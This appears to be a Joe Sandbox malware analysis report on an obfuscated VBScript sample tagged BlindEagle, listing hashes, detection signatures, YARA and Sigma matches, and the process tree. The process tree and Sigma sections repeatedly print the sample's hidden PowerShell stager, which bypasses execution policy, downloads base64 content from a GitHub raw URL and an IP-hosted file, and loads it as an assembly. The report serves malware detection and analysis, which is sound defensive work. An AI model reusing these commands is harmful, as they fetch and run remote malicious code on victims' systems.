Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2THp7fwNQD.vbs

Overview

General Information

Sample name:2THp7fwNQD.vbs
renamed because original name is a hash value
Original sample name:2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs
Analysis ID:1523825
MD5:ae530aa8e50d1d20e9d0ec5ba8eaf303
SHA1:345200f8cc77dd41076b833f762a10de7f856758
SHA256:2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6376 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6652INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x29a3:$b3: ::UTF8.GetString(
  • 0x2f49:$b3: ::UTF8.GetString(
  • 0x7683:$b3: ::UTF8.GetString(
  • 0x9893:$b3: ::UTF8.GetString(
  • 0x9f6f:$b3: ::UTF8.GetString(
  • 0xb8a4:$b3: ::UTF8.GetString(
  • 0xb951:$b3: ::UTF8.GetString(
  • 0xbecd:$b3: ::UTF8.GetString(
  • 0x19680:$b3: ::UTF8.GetString(
  • 0x19c2d:$b3: ::UTF8.GetString(
  • 0x1ab74:$b3: ::UTF8.GetString(
  • 0x1b26f:$b3: ::UTF8.GetString(
  • 0x1baf9:$b3: ::UTF8.GetString(
  • 0x1c23f:$b3: ::UTF8.GetString(
  • 0x1ca71:$b3: ::UTF8.GetString(
  • 0x1d300:$b3: ::UTF8.GetString(
  • 0x1eb8c:$b3: ::UTF8.GetString(
  • 0x411fb:$b3: ::UTF8.GetString(
  • 0x417a1:$b3: ::UTF8.GetString(
  • 0x4892d:$b3: ::UTF8.GetString(
  • 0x48eda:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 5048INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x168c33:$b2: ::FromBase64String(
  • 0x16a344:$b2: ::FromBase64String(
  • 0x13fef:$s1: -join
  • 0x1474f:$s1: -join
  • 0x1f425:$s1: -jOiN
  • 0x1f81d:$s1: -jOiN
  • 0xa871e:$s1: -jOiN
  • 0xb6744:$s1: -join
  • 0xc39c5:$s1: -join
  • 0xc6e87:$s1: -join
  • 0xc7521:$s1: -join
  • 0xc901d:$s1: -join
  • 0xcb27f:$s1: -join
  • 0xcbaa6:$s1: -join
  • 0xcc317:$s1: -join
  • 0xcca52:$s1: -join
  • 0xcca84:$s1: -join
  • 0xccacc:$s1: -join
  • 0xccaeb:$s1: -join
  • 0xcd33c:$s1: -join
  • 0xcd4b8:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2